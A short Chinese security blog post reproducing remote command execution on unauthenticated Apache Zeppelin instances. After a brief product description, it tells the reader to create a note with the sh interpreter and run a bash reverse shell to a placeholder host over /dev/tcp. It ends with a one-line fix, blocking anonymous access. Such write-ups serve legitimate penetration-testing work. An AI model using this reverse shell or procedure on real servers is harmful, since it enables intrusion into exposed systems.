Adminxe's Blog | 低调求发展 - 潜心习安全 ,技术永无止境 | 谢谢您对本站的支持,有什么问题或者建议请及时联系:点击这里给我发消息

Zeppelin未授权访问getshell

渗透测试 Adminxe 3577℃ 0评论

0x00 前言

Apache Zeppelin是一个让交互式数据分析变得可行的基于网页的notebook。Zeppelin提供了数据可视化的框架。

Zeppelin 是一个提供交互数据分析且基于Web的笔记本。方便你做出可数据驱动的、可交互且可协作的精美文档,并且支持多种语言,包括 Scala(使用 Apache Spark)、Python(Apache Spark)、SparkSQL、 Hive、 Markdown、Shell等等。

0x01 漏洞复现

主要是未授权带来了命令执行漏洞,直接干货来操作:

1、Create New Note:

执行Linux反弹,使用sh。

2、执行反弹命令

bash -i &>/dev/tcp/xxxxxxx/xxxxx <&1

3、或者直接进行执行命令:

0x02 修复建议

禁止未授权匿名帐户访问

转载请注明:Adminxe's Blog » Zeppelin未授权访问getshell

喜欢 (10)or分享 (0)
发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址